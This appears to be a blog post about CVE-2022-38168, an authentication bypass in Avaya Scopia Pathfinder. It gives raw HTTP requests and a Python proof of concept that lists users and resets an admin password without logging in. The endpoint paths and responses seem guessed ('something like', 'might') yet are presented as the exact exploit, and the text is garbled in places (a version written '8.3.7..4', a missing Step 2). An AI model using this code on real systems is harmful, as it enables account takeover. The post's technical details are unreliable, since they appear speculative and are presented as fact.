CVE-2022-38168 - Broken Access Control in Avaya Scopia Pathfinder Lets Attackers Bypass Authentication and Reset Passwords
In 2022, a major security vulnerability was discovered in Avaya’s Scopia Pathfinder, affecting versions 8.3.7..4 of both its 10 and 20 PTS products. This issue, recognized as CVE-2022-38168, is a critical broken access control flaw in the user authentication system. Due to this, remote attackers—without any need to log in—can bypass the login page, access sensitive user information, and even reset passwords simply by tweaking the URL in their browser.
This post breaks down what this vulnerability is, why it’s dangerous, and shows, using simple code snippets and demonstrations, exactly how attackers could exploit your system. We’ll also discuss what you can do if you’re running an affected version of Avaya Scopia Pathfinder.
The Vulnerability Explained
Broken access control in this context means the web application fails to properly check if a user is authenticated before letting them access critical pages or perform sensitive operations. Instead, certain URLs intended to be protected are directly accessible without logging in.
How Does the Exploit Work?
The vulnerability is a result of the back-end not properly enforcing authentication checks on sensitive endpoints. An attacker only has to guess or know the right path.
Example Attack Scenario
Suppose your Scopia Pathfinder is running at https://scopia.example.com.
While the normal login workflow protects the dashboard or admin pages, the password reset or user info pages might be accessible directly.
Step 1 – Unauthenticated User Navigates to Login
GET https://scopia.example.com/login
Let's say, after exploring or "guessing" URLs, the attacker lands on something like
GET https://scopia.example.com/users
or
GET https://scopia.example.com/reset_password?userId=1234
Access is granted—without any session or authentication cookie!
Step 3 – Harvesting Sensitive Information
The /users endpoint might leak information like usernames, email addresses, or hashed passwords.
Example Response (redacted)
[
{
"id": "1234",
"username": "jdoe",
"email": "jdoe@example.com",
"role": "admin"
},
{
"id": "5678",
"username": "alice",
"email": "alice@example.com",
"role": "user"
}
]
Then, with an unauthenticated request, the attacker can reset the password for a chosen user
POST https://scopia.example.com/reset_password
Content-Type: application/json
{
"userId": "1234",
"newPassword": "Password123!"
}
Result: The password for user jdoe is updated, and the attacker can now log in as that user.
Proof of Concept (PoC)
Here’s a simple Python snippet using the popular requests library to fetch the user list and reset an admin password, all without authentication:
import requests
base_url = "https://scopia.example.com"
# Grab user list
resp = requests.get(f"{base_url}/users", verify=False)
print(resp.text)
# Suppose admin's userId is 1234
reset_data = {"userId": "1234", "newPassword": "Passwrd!"}
resp2 = requests.post(f"{base_url}/reset_password", json=reset_data, verify=False)
print(resp2.status_code, resp2.text)
Warning: This is for demonstration only. Never run against systems without authorization.
References and Further Reading
- CVE-2022-38168 in NIST's National Vulnerability Database
- Avaya Security Advisories
- OWASP: Broken Access Control
Upgrade to the latest, supported version if possible.
- In the meantime, restrict access to Scopia Pathfinder from the internet using firewalls/VPNs.
Final Thoughts
Vulnerabilities like CVE-2022-38168 underline the critical importance of proper access control. Even a sophisticated conferencing platform like Avaya Scopia can have simple, devastating security holes if endpoints are not protected by rigorous authentication checks.
If you’re running the affected versions, isolate the system immediately, inform your security teams, and plan to migrate or upgrade.
Timeline
Published on: 11/03/2022 21:15:00 UTC
Last modified on: 11/08/2022 16:06:00 UTC